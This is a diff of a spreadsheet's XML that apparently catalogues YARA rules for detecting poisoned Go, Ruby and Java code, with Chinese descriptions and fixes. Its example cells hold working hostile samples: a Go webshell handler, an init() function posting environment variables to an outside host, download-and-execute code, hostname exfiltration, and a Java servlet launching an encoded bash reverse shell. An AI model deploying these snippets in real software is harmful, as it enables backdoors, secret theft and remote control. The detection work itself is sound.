+  </si>
+  <si>
+    <t>golang_scan/go_send_info.yar</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>检测注册http后门函数</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>.go</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>检测用于go语言投毒的cc服务器</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>检测go语言的混淆代码行为</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>检测go语言敏感信息外发</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>已废弃</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>http.HandleFunc("/backdoor", func(w http.ResponseWriter, r *http.Request) {
+    cmd := request.URL.Query().Get("cmd")
+    exec.Command("/bin/sh", "-c", cmd)
+})</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>检测到代码中注册http后门函数，执行来自攻击者的命令，请排查。
+修复方式：移除后门webshell。</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>func init() {
+  if x0__.Getenv("e452d6ab") == "" {
+    x4__, _ := x3__.Marshal(x0__.Environ())
+    x0__.Setenv("e452d6ab", "1")
+    x2__.Post("http://ovz1.j19544519.pr46m.vps.myjino.ru:49460?org=tockins&amp;repo=fresh", "application/json", x1__.NewBuffer(x4__))
+  }
+}</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>检测到知名的go语言投毒cc服务器，请检查是否包含不认识的网址。
+修复方式：对检出的URL做检查，如果是陌生域名，请进行修改。如果是误报，请屏蔽。</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>reader := bufio.NewReaderSize(r.Body, 32*1024)
+file, err := os.Create(fileName)
+writer := bufio.NewWriter(file)
+exec.Command("./"+fileName)</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>检测到下载木马文件并执行的行为。
+修复方式：对检出的URL和执行命令的行为做检查。如果是陌生的下载文件，请进行修改。如果是误报，请屏蔽。</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>检测监听端口执行命令的行为</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>暂无</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>无</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>更新中</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>import ("unixpickle/gobfuscate")</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>检测到尝试对go语言进行混淆，防止对源码进行分析。
+修复方式：如果是误报，请屏蔽。</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>func init(){
+    hostname, err := os.Hostname()
+    resp, err := http.Get("http://httpbin.org/get" + hostname)
+}</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>检测到获取系统信息（例如hostname、ip、mac）并通过http外发，请排查。</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>APT</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>apt_yara/shadowbrokers_nopen_client.yar</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>apt_yara/shadowbrokers_nopen_server.yar</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>检测apt的“酸狐狸”攻击载荷</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>检出和酸狐狸代码特征相似的代码，请排查，参考链接https://github.com/AlphabugX/nopen</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>ruby_scan/ruby_sendinfo2.yar</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>ruby_scan/ruby_sendinfo3.yar</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>java_scan/runtime_reverse_shell.yar</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>检测通过执行命令来反弹shell的行为</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>Java代码中使用调用系统命令的方式，反弹shell，执行来自外部攻击者的命令。</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t xml:space="preserve">    protected void doGet(HttpServletRequest req) throws ServletException, IOException {
+        Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzQ1Ljg3LjEyMi41NC84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}");
+    }</t>
+    <phoneticPr fontId="1" type="noConversion"/>
   </si>
 </sst>
 </file>
@@ -763,7 +936,7 @@
       <patternFill patternType="gray125"/>
     </fill>
   </fills>
-  <borders count="2">
+  <borders count="3">
     <border>
       <left/>
       <right/>
@@ -786,13 +959,26 @@
       </bottom>
       <diagonal/>
     </border>
+    <border>
+      <left style="thin">
+        <color auto="1"/>
+      </left>
+      <right style="thin">
+        <color auto="1"/>
+      </right>
+      <top/>
+      <bottom style="thin">
+        <color auto="1"/>
+      </bottom>
+      <diagonal/>
+    </border>
   </borders>
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
       <alignment vertical="center"/>
     </xf>
   </cellStyleXfs>
-  <cellXfs count="6">
+  <cellXfs count="11">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0">
       <alignment vertical="center"/>
     </xf>
@@ -809,6 +995,21 @@
       <alignment vertical="center" wrapText="1"/>
     </xf>
     <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1">
+      <alignment vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="2" fillId="0" borderId="2" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
+      <alignment vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
       <alignment vertical="center"/>
     </xf>
   </cellXfs>
@@ -1115,10 +1316,10 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0000-000000000000}">
-  <dimension ref="A1:G54"/>
+  <dimension ref="A1:G62"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A4" workbookViewId="0">
-      <selection activeCell="B6" sqref="B6"/>
+    <sheetView tabSelected="1" topLeftCell="C1" workbookViewId="0">
+      <selection activeCell="G57" sqref="G57"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultColWidth="9" defaultRowHeight="13.5" x14ac:dyDescent="0.3"/>
@@ -1591,38 +1792,38 @@
         <v>122</v>
       </c>
     </row>
-    <row r="21" spans="1:7" ht="378" x14ac:dyDescent="0.3">
+    <row r="21" spans="1:7" ht="94.5" x14ac:dyDescent="0.3">
       <c r="A21" s="3" t="s">
-        <v>51</v>
+        <v>43</v>
       </c>
       <c r="B21" s="5" t="s">
-        <v>123</v>
-      </c>
-      <c r="C21" s="3" t="s">
-        <v>52</v>
+        <v>203</v>
+      </c>
+      <c r="C21" s="5" t="s">
+        <v>204</v>
       </c>
       <c r="D21" s="3" t="s">
-        <v>53</v>
+        <v>46</v>
       </c>
       <c r="E21" s="3" t="s">
         <v>9</v>
       </c>
-      <c r="F21" s="2" t="s">
-        <v>54</v>
+      <c r="F21" s="4" t="s">
+        <v>206</v>
       </c>
       <c r="G21" s="4" t="s">
-        <v>144</v>
-      </c>
-    </row>
-    <row r="22" spans="1:7" ht="405" x14ac:dyDescent="0.3">
+        <v>205</v>
+      </c>
+    </row>
+    <row r="22" spans="1:7" ht="378" x14ac:dyDescent="0.3">
       <c r="A22" s="3" t="s">
         <v>51</v>
       </c>
-      <c r="B22" s="3" t="s">
-        <v>55</v>
+      <c r="B22" s="5" t="s">
+        <v>123</v>
       </c>
       <c r="C22" s="3" t="s">
-        <v>56</v>
+        <v>52</v>
       </c>
       <c r="D22" s="3" t="s">
         <v>53</v>
@@ -1630,22 +1831,22 @@
       <c r="E22" s="3" t="s">
         <v>9</v>
       </c>
-      <c r="F22" s="4" t="s">
-        <v>146</v>
+      <c r="F22" s="2" t="s">
+        <v>54</v>
       </c>
       <c r="G22" s="4" t="s">
-        <v>147</v>
-      </c>
-    </row>
-    <row r="23" spans="1:7" ht="409.5" x14ac:dyDescent="0.3">
+        <v>144</v>
+      </c>
+    </row>
+    <row r="23" spans="1:7" ht="405" x14ac:dyDescent="0.3">
       <c r="A23" s="3" t="s">
         <v>51</v>
       </c>
       <c r="B23" s="3" t="s">
-        <v>57</v>
+        <v>55</v>
       </c>
       <c r="C23" s="3" t="s">
-        <v>58</v>
+        <v>56</v>
       </c>
       <c r="D23" s="3" t="s">
         <v>53</v>
@@ -1657,18 +1858,18 @@
         <v>146</v>
       </c>
       <c r="G23" s="4" t="s">
-        <v>145</v>
-      </c>
-    </row>
-    <row r="24" spans="1:7" ht="405" x14ac:dyDescent="0.3">
+        <v>147</v>
+      </c>
+    </row>
+    <row r="24" spans="1:7" ht="409.5" x14ac:dyDescent="0.3">
       <c r="A24" s="3" t="s">
         <v>51</v>
       </c>
-      <c r="B24" s="5" t="s">
-        <v>124</v>
-      </c>
-      <c r="C24" s="5" t="s">
-        <v>135</v>
+      <c r="B24" s="3" t="s">
+        <v>57</v>
+      </c>
+      <c r="C24" s="3" t="s">
+        <v>58</v>
       </c>
       <c r="D24" s="3" t="s">
         <v>53</v>
@@ -1677,33 +1878,33 @@
         <v>9</v>
       </c>
       <c r="F24" s="4" t="s">
+        <v>146</v>
+      </c>
+      <c r="G24" s="4" t="s">
+        <v>145</v>
+      </c>
+    </row>
+    <row r="25" spans="1:7" ht="405" x14ac:dyDescent="0.3">
+      <c r="A25" s="3" t="s">
+        <v>51</v>
+      </c>
+      <c r="B25" s="5" t="s">
+        <v>124</v>
+      </c>
+      <c r="C25" s="5" t="s">
+        <v>135</v>
+      </c>
+      <c r="D25" s="3" t="s">
+        <v>53</v>
+      </c>
+      <c r="E25" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F25" s="4" t="s">
         <v>136</v>
       </c>
-      <c r="G24" s="4" t="s">
+      <c r="G25" s="4" t="s">
         <v>148</v>
-      </c>
-    </row>
-    <row r="25" spans="1:7" x14ac:dyDescent="0.3">
-      <c r="A25" s="3" t="s">
-        <v>59</v>
-      </c>
-      <c r="B25" s="3" t="s">
-        <v>60</v>
-      </c>
-      <c r="C25" s="3" t="s">
-        <v>61</v>
-      </c>
-      <c r="D25" s="3" t="s">
-        <v>62</v>
-      </c>
-      <c r="E25" s="3" t="s">
-        <v>9</v>
-      </c>
-      <c r="F25" s="3" t="s">
-        <v>63</v>
-      </c>
-      <c r="G25" s="4" t="s">
-        <v>143</v>
       </c>
     </row>
     <row r="26" spans="1:7" x14ac:dyDescent="0.3">
@@ -1711,10 +1912,10 @@
         <v>59</v>
       </c>
       <c r="B26" s="3" t="s">
-        <v>64</v>
-      </c>
-      <c r="C26" s="5" t="s">
-        <v>138</v>
+        <v>60</v>
+      </c>
+      <c r="C26" s="3" t="s">
+        <v>61</v>
       </c>
       <c r="D26" s="3" t="s">
         <v>62</v>
@@ -1734,10 +1935,10 @@
         <v>59</v>
       </c>
       <c r="B27" s="3" t="s">
-        <v>65</v>
+        <v>64</v>
       </c>
       <c r="C27" s="5" t="s">
-        <v>137</v>
+        <v>138</v>
       </c>
       <c r="D27" s="3" t="s">
         <v>62</v>
@@ -1757,10 +1958,10 @@
         <v>59</v>
       </c>
       <c r="B28" s="3" t="s">
-        <v>66</v>
-      </c>
-      <c r="C28" s="3" t="s">
-        <v>28</v>
+        <v>65</v>
+      </c>
+      <c r="C28" s="5" t="s">
+        <v>137</v>
       </c>
       <c r="D28" s="3" t="s">
         <v>62</v>
@@ -1780,10 +1981,10 @@
         <v>59</v>
       </c>
       <c r="B29" s="3" t="s">
-        <v>67</v>
+        <v>66</v>
       </c>
       <c r="C29" s="3" t="s">
-        <v>68</v>
+        <v>28</v>
       </c>
       <c r="D29" s="3" t="s">
         <v>62</v>
@@ -1803,10 +2004,10 @@
         <v>59</v>
       </c>
       <c r="B30" s="3" t="s">
-        <v>69</v>
+        <v>67</v>
       </c>
       <c r="C30" s="3" t="s">
-        <v>70</v>
+        <v>68</v>
       </c>
       <c r="D30" s="3" t="s">
         <v>62</v>
@@ -1826,10 +2027,10 @@
         <v>59</v>
       </c>
       <c r="B31" s="3" t="s">
-        <v>71</v>
-      </c>
-      <c r="C31" s="5" t="s">
-        <v>139</v>
+        <v>69</v>
+      </c>
+      <c r="C31" s="3" t="s">
+        <v>70</v>
       </c>
       <c r="D31" s="3" t="s">
         <v>62</v>
@@ -1848,11 +2049,11 @@
       <c r="A32" s="3" t="s">
         <v>59</v>
       </c>
-      <c r="B32" s="5" t="s">
-        <v>131</v>
+      <c r="B32" s="3" t="s">
+        <v>71</v>
       </c>
       <c r="C32" s="5" t="s">
-        <v>132</v>
+        <v>139</v>
       </c>
       <c r="D32" s="3" t="s">
         <v>62</v>
@@ -1871,11 +2072,11 @@
       <c r="A33" s="3" t="s">
         <v>59</v>
       </c>
-      <c r="B33" s="3" t="s">
-        <v>72</v>
-      </c>
-      <c r="C33" s="3" t="s">
-        <v>73</v>
+      <c r="B33" s="5" t="s">
+        <v>131</v>
+      </c>
+      <c r="C33" s="5" t="s">
+        <v>132</v>
       </c>
       <c r="D33" s="3" t="s">
         <v>62</v>
@@ -1895,10 +2096,10 @@
         <v>59</v>
       </c>
       <c r="B34" s="3" t="s">
-        <v>74</v>
+        <v>72</v>
       </c>
       <c r="C34" s="3" t="s">
-        <v>75</v>
+        <v>73</v>
       </c>
       <c r="D34" s="3" t="s">
         <v>62</v>
@@ -1918,10 +2119,10 @@
         <v>59</v>
       </c>
       <c r="B35" s="3" t="s">
-        <v>76</v>
+        <v>74</v>
       </c>
       <c r="C35" s="3" t="s">
-        <v>42</v>
+        <v>75</v>
       </c>
       <c r="D35" s="3" t="s">
         <v>62</v>
@@ -1940,11 +2141,11 @@
       <c r="A36" s="3" t="s">
         <v>59</v>
       </c>
-      <c r="B36" s="5" t="s">
-        <v>134</v>
-      </c>
-      <c r="C36" s="5" t="s">
-        <v>133</v>
+      <c r="B36" s="3" t="s">
+        <v>76</v>
+      </c>
+      <c r="C36" s="3" t="s">
+        <v>42</v>
       </c>
       <c r="D36" s="3" t="s">
         <v>62</v>
@@ -1963,11 +2164,11 @@
       <c r="A37" s="3" t="s">
         <v>59</v>
       </c>
-      <c r="B37" s="3" t="s">
-        <v>77</v>
+      <c r="B37" s="5" t="s">
+        <v>201</v>
       </c>
       <c r="C37" s="3" t="s">
-        <v>78</v>
+        <v>42</v>
       </c>
       <c r="D37" s="3" t="s">
         <v>62</v>
@@ -1982,107 +2183,107 @@
         <v>143</v>
       </c>
     </row>
-    <row r="38" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
+    <row r="38" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A38" s="3" t="s">
-        <v>79</v>
+        <v>59</v>
       </c>
       <c r="B38" s="5" t="s">
-        <v>126</v>
+        <v>202</v>
       </c>
       <c r="C38" s="3" t="s">
-        <v>80</v>
+        <v>42</v>
       </c>
       <c r="D38" s="3" t="s">
-        <v>81</v>
+        <v>62</v>
       </c>
       <c r="E38" s="3" t="s">
         <v>9</v>
       </c>
-      <c r="F38" s="2" t="s">
-        <v>82</v>
+      <c r="F38" s="3" t="s">
+        <v>63</v>
       </c>
       <c r="G38" s="4" t="s">
-        <v>149</v>
-      </c>
-    </row>
-    <row r="39" spans="1:7" ht="54" x14ac:dyDescent="0.3">
+        <v>143</v>
+      </c>
+    </row>
+    <row r="39" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A39" s="3" t="s">
-        <v>79</v>
-      </c>
-      <c r="B39" s="3" t="s">
-        <v>83</v>
-      </c>
-      <c r="C39" s="3" t="s">
-        <v>84</v>
+        <v>59</v>
+      </c>
+      <c r="B39" s="5" t="s">
+        <v>134</v>
+      </c>
+      <c r="C39" s="5" t="s">
+        <v>133</v>
       </c>
       <c r="D39" s="3" t="s">
-        <v>81</v>
+        <v>62</v>
       </c>
       <c r="E39" s="3" t="s">
         <v>9</v>
       </c>
       <c r="F39" s="3" t="s">
-        <v>85</v>
+        <v>63</v>
       </c>
       <c r="G39" s="4" t="s">
-        <v>150</v>
-      </c>
-    </row>
-    <row r="40" spans="1:7" ht="54" x14ac:dyDescent="0.3">
+        <v>143</v>
+      </c>
+    </row>
+    <row r="40" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A40" s="3" t="s">
-        <v>79</v>
+        <v>59</v>
       </c>
       <c r="B40" s="3" t="s">
-        <v>86</v>
+        <v>77</v>
       </c>
       <c r="C40" s="3" t="s">
-        <v>87</v>
+        <v>78</v>
       </c>
       <c r="D40" s="3" t="s">
-        <v>88</v>
+        <v>62</v>
       </c>
       <c r="E40" s="3" t="s">
         <v>9</v>
       </c>
       <c r="F40" s="3" t="s">
-        <v>89</v>
+        <v>63</v>
       </c>
       <c r="G40" s="4" t="s">
-        <v>151</v>
-      </c>
-    </row>
-    <row r="41" spans="1:7" ht="54" x14ac:dyDescent="0.3">
+        <v>143</v>
+      </c>
+    </row>
+    <row r="41" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
       <c r="A41" s="3" t="s">
         <v>79</v>
       </c>
-      <c r="B41" s="3" t="s">
-        <v>90</v>
-      </c>
-      <c r="C41" s="5" t="s">
-        <v>127</v>
+      <c r="B41" s="5" t="s">
+        <v>126</v>
+      </c>
+      <c r="C41" s="3" t="s">
+        <v>80</v>
       </c>
       <c r="D41" s="3" t="s">
-        <v>88</v>
+        <v>81</v>
       </c>
       <c r="E41" s="3" t="s">
         <v>9</v>
       </c>
-      <c r="F41" s="3" t="s">
-        <v>91</v>
+      <c r="F41" s="2" t="s">
+        <v>82</v>
       </c>
       <c r="G41" s="4" t="s">
-        <v>152</v>
-      </c>
-    </row>
-    <row r="42" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
+        <v>149</v>
+      </c>
+    </row>
+    <row r="42" spans="1:7" ht="54" x14ac:dyDescent="0.3">
       <c r="A42" s="3" t="s">
         <v>79</v>
       </c>
-      <c r="B42" s="5" t="s">
-        <v>129</v>
+      <c r="B42" s="3" t="s">
+        <v>83</v>
       </c>
       <c r="C42" s="3" t="s">
-        <v>92</v>
+        <v>84</v>
       </c>
       <c r="D42" s="3" t="s">
         <v>81</v>
@@ -2091,64 +2292,67 @@
         <v>9</v>
       </c>
       <c r="F42" s="3" t="s">
-        <v>93</v>
+        <v>85</v>
       </c>
       <c r="G42" s="4" t="s">
-        <v>153</v>
+        <v>150</v>
       </c>
     </row>
     <row r="43" spans="1:7" ht="54" x14ac:dyDescent="0.3">
       <c r="A43" s="3" t="s">
         <v>79</v>
       </c>
-      <c r="B43" s="5" t="s">
-        <v>128</v>
+      <c r="B43" s="3" t="s">
+        <v>86</v>
       </c>
       <c r="C43" s="3" t="s">
-        <v>94</v>
+        <v>87</v>
       </c>
       <c r="D43" s="3" t="s">
-        <v>81</v>
+        <v>88</v>
       </c>
       <c r="E43" s="3" t="s">
         <v>9</v>
       </c>
       <c r="F43" s="3" t="s">
-        <v>95</v>
+        <v>89</v>
       </c>
       <c r="G43" s="4" t="s">
-        <v>130</v>
-      </c>
-    </row>
-    <row r="44" spans="1:7" x14ac:dyDescent="0.3">
+        <v>151</v>
+      </c>
+    </row>
+    <row r="44" spans="1:7" ht="54" x14ac:dyDescent="0.3">
       <c r="A44" s="3" t="s">
-        <v>96</v>
+        <v>79</v>
       </c>
       <c r="B44" s="3" t="s">
-        <v>97</v>
-      </c>
-      <c r="C44" s="3" t="s">
-        <v>98</v>
+        <v>90</v>
+      </c>
+      <c r="C44" s="5" t="s">
+        <v>127</v>
       </c>
       <c r="D44" s="3" t="s">
-        <v>81</v>
+        <v>88</v>
       </c>
       <c r="E44" s="3" t="s">
         <v>9</v>
       </c>
       <c r="F44" s="3" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="45" spans="1:7" x14ac:dyDescent="0.3">
+        <v>91</v>
+      </c>
+      <c r="G44" s="4" t="s">
+        <v>152</v>
+      </c>
+    </row>
+    <row r="45" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
       <c r="A45" s="3" t="s">
-        <v>96</v>
-      </c>
-      <c r="B45" s="3" t="s">
-        <v>99</v>
+        <v>79</v>
+      </c>
+      <c r="B45" s="5" t="s">
+        <v>129</v>
       </c>
       <c r="C45" s="3" t="s">
-        <v>61</v>
+        <v>92</v>
       </c>
       <c r="D45" s="3" t="s">
         <v>81</v>
@@ -2157,18 +2361,21 @@
         <v>9</v>
       </c>
       <c r="F45" s="3" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="46" spans="1:7" x14ac:dyDescent="0.3">
+        <v>93</v>
+      </c>
+      <c r="G45" s="4" t="s">
+        <v>153</v>
+      </c>
+    </row>
+    <row r="46" spans="1:7" ht="54" x14ac:dyDescent="0.3">
       <c r="A46" s="3" t="s">
-        <v>96</v>
-      </c>
-      <c r="B46" s="3" t="s">
-        <v>100</v>
+        <v>79</v>
+      </c>
+      <c r="B46" s="5" t="s">
+        <v>128</v>
       </c>
       <c r="C46" s="3" t="s">
-        <v>37</v>
+        <v>94</v>
       </c>
       <c r="D46" s="3" t="s">
         <v>81</v>
@@ -2177,7 +2384,10 @@
         <v>9</v>
       </c>
       <c r="F46" s="3" t="s">
-        <v>9</v>
+        <v>95</v>
+      </c>
+      <c r="G46" s="4" t="s">
+        <v>130</v>
       </c>
     </row>
     <row r="47" spans="1:7" x14ac:dyDescent="0.3">
@@ -2185,10 +2395,10 @@
         <v>96</v>
       </c>
       <c r="B47" s="3" t="s">
-        <v>101</v>
+        <v>97</v>
       </c>
       <c r="C47" s="3" t="s">
-        <v>37</v>
+        <v>98</v>
       </c>
       <c r="D47" s="3" t="s">
         <v>81</v>
@@ -2198,6 +2408,9 @@
       </c>
       <c r="F47" s="3" t="s">
         <v>9</v>
+      </c>
+      <c r="G47" s="4" t="s">
+        <v>181</v>
       </c>
     </row>
     <row r="48" spans="1:7" x14ac:dyDescent="0.3">
@@ -2205,10 +2418,10 @@
         <v>96</v>
       </c>
       <c r="B48" s="3" t="s">
-        <v>102</v>
+        <v>99</v>
       </c>
       <c r="C48" s="3" t="s">
-        <v>24</v>
+        <v>61</v>
       </c>
       <c r="D48" s="3" t="s">
         <v>81</v>
@@ -2219,19 +2432,22 @@
       <c r="F48" s="3" t="s">
         <v>9</v>
       </c>
-    </row>
-    <row r="49" spans="1:6" x14ac:dyDescent="0.3">
+      <c r="G48" s="4" t="s">
+        <v>181</v>
+      </c>
+    </row>
+    <row r="49" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A49" s="3" t="s">
         <v>96</v>
       </c>
       <c r="B49" s="3" t="s">
-        <v>103</v>
+        <v>100</v>
       </c>
       <c r="C49" s="3" t="s">
-        <v>104</v>
+        <v>37</v>
       </c>
       <c r="D49" s="3" t="s">
-        <v>105</v>
+        <v>81</v>
       </c>
       <c r="E49" s="3" t="s">
         <v>9</v>
@@ -2239,61 +2455,291 @@
       <c r="F49" s="3" t="s">
         <v>9</v>
       </c>
-    </row>
-    <row r="50" spans="1:6" x14ac:dyDescent="0.3">
+      <c r="G49" s="4" t="s">
+        <v>181</v>
+      </c>
+    </row>
+    <row r="50" spans="1:7" x14ac:dyDescent="0.3">
       <c r="A50" s="3" t="s">
         <v>96</v>
       </c>
       <c r="B50" s="3" t="s">
+        <v>101</v>
+      </c>
+      <c r="C50" s="3" t="s">
+        <v>37</v>
+      </c>
+      <c r="D50" s="3" t="s">
+        <v>81</v>
+      </c>
+      <c r="E50" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F50" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="G50" s="4" t="s">
+        <v>181</v>
+      </c>
+    </row>
+    <row r="51" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="A51" s="3" t="s">
+        <v>96</v>
+      </c>
+      <c r="B51" s="3" t="s">
+        <v>102</v>
+      </c>
+      <c r="C51" s="3" t="s">
+        <v>24</v>
+      </c>
+      <c r="D51" s="3" t="s">
+        <v>81</v>
+      </c>
+      <c r="E51" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F51" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="G51" s="4" t="s">
+        <v>181</v>
+      </c>
+    </row>
+    <row r="52" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="A52" s="3" t="s">
+        <v>96</v>
+      </c>
+      <c r="B52" s="3" t="s">
+        <v>103</v>
+      </c>
+      <c r="C52" s="3" t="s">
+        <v>104</v>
+      </c>
+      <c r="D52" s="3" t="s">
+        <v>105</v>
+      </c>
+      <c r="E52" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F52" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="G52" s="4" t="s">
+        <v>181</v>
+      </c>
+    </row>
+    <row r="53" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="A53" s="3" t="s">
+        <v>96</v>
+      </c>
+      <c r="B53" s="3" t="s">
         <v>106</v>
       </c>
-      <c r="C50" s="3" t="s">
+      <c r="C53" s="3" t="s">
         <v>107</v>
       </c>
-      <c r="D50" s="3" t="s">
+      <c r="D53" s="3" t="s">
         <v>108</v>
       </c>
-      <c r="E50" s="3" t="s">
-        <v>9</v>
-      </c>
-      <c r="F50" s="3" t="s">
-        <v>9</v>
-      </c>
-    </row>
-    <row r="51" spans="1:6" x14ac:dyDescent="0.3">
-      <c r="A51" s="3"/>
-      <c r="B51" s="3"/>
-      <c r="C51" s="3"/>
-      <c r="D51" s="3"/>
-      <c r="E51" s="3"/>
-      <c r="F51" s="3"/>
-    </row>
-    <row r="52" spans="1:6" x14ac:dyDescent="0.3">
-      <c r="A52" s="3"/>
-      <c r="B52" s="3"/>
-      <c r="C52" s="3"/>
-      <c r="D52" s="3"/>
-      <c r="E52" s="3"/>
-      <c r="F52" s="3"/>
-    </row>
-    <row r="53" spans="1:6" x14ac:dyDescent="0.3">
-      <c r="A53" s="3"/>
-      <c r="B53" s="3"/>
-      <c r="C53" s="3"/>
-      <c r="D53" s="3"/>
-      <c r="E53" s="3"/>
-      <c r="F53" s="3"/>
-    </row>
-    <row r="54" spans="1:6" x14ac:dyDescent="0.3">
-      <c r="A54" s="3"/>
-      <c r="B54" s="3"/>
-      <c r="C54" s="3"/>
-      <c r="D54" s="3"/>
-      <c r="E54" s="3"/>
-      <c r="F54" s="3"/>
+      <c r="E53" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F53" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="G53" s="4" t="s">
+        <v>181</v>
+      </c>
+    </row>
+    <row r="54" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
+      <c r="A54" s="5" t="s">
+        <v>169</v>
+      </c>
+      <c r="B54" s="5" t="s">
+        <v>170</v>
+      </c>
+      <c r="C54" s="5" t="s">
+        <v>176</v>
+      </c>
+      <c r="D54" s="5" t="s">
+        <v>177</v>
+      </c>
+      <c r="E54" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F54" s="4" t="s">
+        <v>182</v>
+      </c>
+      <c r="G54" s="4" t="s">
+        <v>183</v>
+      </c>
+    </row>
+    <row r="55" spans="1:7" ht="135" x14ac:dyDescent="0.3">
+      <c r="A55" s="5" t="s">
+        <v>169</v>
+      </c>
+      <c r="B55" s="5" t="s">
+        <v>171</v>
+      </c>
+      <c r="C55" s="5" t="s">
+        <v>178</v>
+      </c>
+      <c r="D55" s="5" t="s">
+        <v>177</v>
+      </c>
+      <c r="E55" s="3" t="s">
+        <v>9</v>
+      </c>
+      <c r="F55" s="4" t="s">
+        <v>184</v>
+      </c>
+      <c r="G55" s="4" t="s">
+        <v>185</v>
+      </c>
+    </row>
+    <row r="56" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
